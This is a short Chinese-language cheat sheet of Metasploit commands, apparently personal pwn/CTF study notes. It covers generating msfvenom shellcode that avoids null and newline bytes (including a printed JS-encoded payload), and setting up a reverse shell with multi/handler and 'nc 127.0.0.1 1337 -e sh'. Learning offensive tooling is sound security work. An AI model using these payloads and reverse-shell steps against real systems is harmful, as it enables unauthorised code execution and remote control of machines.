查詢審查過的模塊
Vulnerability & Exploit Database | Rapid7
產生shellcode
顯示payload列表
shellcode search arm -l payload
生成shellcode
msfvenom -p windows/exec CMD=calc.exe -f python
避免含有null
字元
msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00'
避免含有換行,注意windows的\r
msfvenom -p windows/x64/exec CMD=calc.exe -f python -b '\x00\x0a\x0d'
產生 linux shellcode
msfvenom -p linux/x64/exec CMD=whoami -f js_le --nopsled 32
var shellcode = unescape("%u99fd%ufc9f%u9e90%u9398%u9192%u9392%u989f%uf99b%u9b91%u9b90%uf89f%u9ef9%uf8fc%u9b9b%u98fd%u9b98%ub848%u622f%u6e69%u732f%u0068%u5099%u5f54%u6652%u2d68%u5463%u525e%u07e8%u0000%u7700%u6f68%u6d61%u0069%u5756%u5e54%u3b6a%u0f58%u4105")
多個參數
msfvenom -p linux/x64/exec CMD='echo exploit working' -f js_le -n 32 -e generic/none
也可以用 -f hex
之後得到一整串 hex 可以切成 byte,或者轉乘 base64 拿去 cyberchef 轉換
注意
如果在操作nc時,nc也可能受到\x00
、\x0a
、\x0d
的影響。
建立反向shell
透過msf的內建session監聽,-q
僅用來不打印初始圖像
msfconsole -q
配置使用模塊
use exploit/multi/handler
set payload generic/shell_reverse_tcp
配置反向shell使用端口與地址
set lhost 0.0.0.0
set lport 1337
run
啟動nc進行連結
nc 127.0.0.1 1337 -e sh
參見
Information Security pwn